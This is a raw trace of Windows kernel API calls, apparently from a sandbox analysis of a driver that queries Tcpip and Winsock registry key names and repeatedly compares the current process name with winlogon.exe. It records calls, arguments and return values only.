| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Setup Migration\Providers\Tcpip, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Winsock\Setup Migration\Providers\Tcpip | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Winsock | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8defc80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8defc80, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9112450, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9112450, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002af86c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
